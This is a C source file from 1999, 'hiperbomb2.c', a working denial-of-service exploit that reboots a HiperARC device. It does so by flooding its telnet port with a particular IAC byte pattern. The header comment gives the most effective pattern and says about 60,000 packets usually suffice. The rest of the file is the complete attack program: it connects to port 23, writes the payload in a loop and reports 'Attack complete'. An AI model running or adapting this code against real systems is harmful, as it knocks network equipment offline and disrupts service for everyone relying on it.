/* ---------------------------------------------------------------------
 * hiperbomb2.c - Reboots HiperARC faster.
 * ---------------------------------------------------------------------
 * (c) 1999 - Jonathan Chapman <jchapman@1st.net>
 * ---------------------------------------------------------------------
 * Sends a high volume of IACs which eventually leads to a reboot of the
 * HiperARC.  Brief testing indicated that this problem is most likely 
 * specific to sending IACs rather than any other type of data.  Further
 * research has shown that specific IAC patterns are more likely to cause
 * a reboot.  In this example I use one of the most efficient combinations
 * I have discovered.  Through my testing it usually required at least
 * 60,000 packets to cause the HiperARC to reboot.
 * ---------------------------------------------------------------------
 */


#include <stdio.h>
#include <stdarg.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

char *chassis;
int sockfd, num_of_tries;

void connect_to_chassis(char *name)
{
        struct hostent *host;
        struct sockaddr_in remote;

        host = gethostbyname(name);

        if(!host) {
  fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
        }

        sockfd = socket(AF_INET, SOCK_STREAM, 0);

        if(sockfd < 0) {
        fprintf(stderr, "Cannot obtain descriptor.\n");
  exit(4);
        }

        remote.sin_family = AF_INET;
        remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
        remote.sin_port = htons(23);

        connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));

  return;
}

void send_iacs()
{
        unsigned char reply[3] = {254, 36, 185};
  unsigned int k;

        for(k = 0; k < num_of_tries; k++) {
        write(sockfd, reply, 3);
  }
}

int main(int ac, char **av)
{

        if(ac < 3) {
        fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
  fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
        exit(2);
        }

        chassis = av[1];
  num_of_tries = atoi(av[2]);

        fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", 
    chassis, num_of_tries);
        connect_to_chassis(chassis);
        send_iacs();
        fprintf(stderr, "Attack complete.\n");

        exit(0);
}